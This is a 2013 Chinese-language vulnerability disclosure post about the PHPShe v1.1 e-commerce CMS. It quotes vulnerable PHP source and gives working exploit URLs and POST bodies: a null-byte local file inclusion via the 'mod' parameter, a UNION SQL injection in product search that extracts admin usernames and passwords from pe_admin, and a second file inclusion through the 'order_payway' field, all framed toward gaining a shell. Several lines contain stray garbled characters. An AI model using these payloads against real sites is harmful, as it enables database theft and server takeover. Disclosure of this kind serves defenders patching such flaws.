phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-19 19:01:54
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 整体大概参数传输: common.php 通过 extract() 把 GET/POST/SESSION/COOKIE 参数注册为带 _g/_p/_s/_c 前缀的变量，后文出现的 $_g_keyword、$_p_info 等变量均由此而来。


//common.php
if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0x01 包含漏洞


//首页文件
<?php
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
pe_result();
?>
//common 文件 第15行开始
//url路由配置
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
$ `0 Q" t0 ?- B7 F. m8 e( X9 y% m//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00



0x02 搜索注入

<code id="code2">

//product.php文件
case 'list':
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
//搜索
$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
if ($category_id) {
$sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
if ($_g_orderby) {
$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
else {
$sqlwhere .= " order by `product_id` desc";
}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
$product_hotlist = product_hotlist();
//当前路径
$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
//处理条件语句
$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
, m/ w2 X. J" G- J( nproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

</code>

0x03 包含漏洞2

<code id="code3">

//order.php
case 'pay':
$order_id = pe_dbhold($_g_id);
$cache_payway = cache::get('payway');
foreach($cache_payway as $k => $v) {
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
if ($k == 'bank') {
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
}
}
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
!$order['order_id'] && pe_error('订单号错误...');
if (isset($_p_pesubmit)) {
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
foreach ($info_list as $v) {
$order['order_name'] .= "{$v['product_name']};";
}
echo '正在为您连接支付网站,请稍后...';
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
}//当一切准备好的时候就可以进行"鸡肋包含了"
else {
pe_error('支付错误...');
}
}
$seo = pe_seo('选择支付方式');
include(pe_tpl('order_pay.html'));
break;
}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>* T2 b- L8 r1 E( I
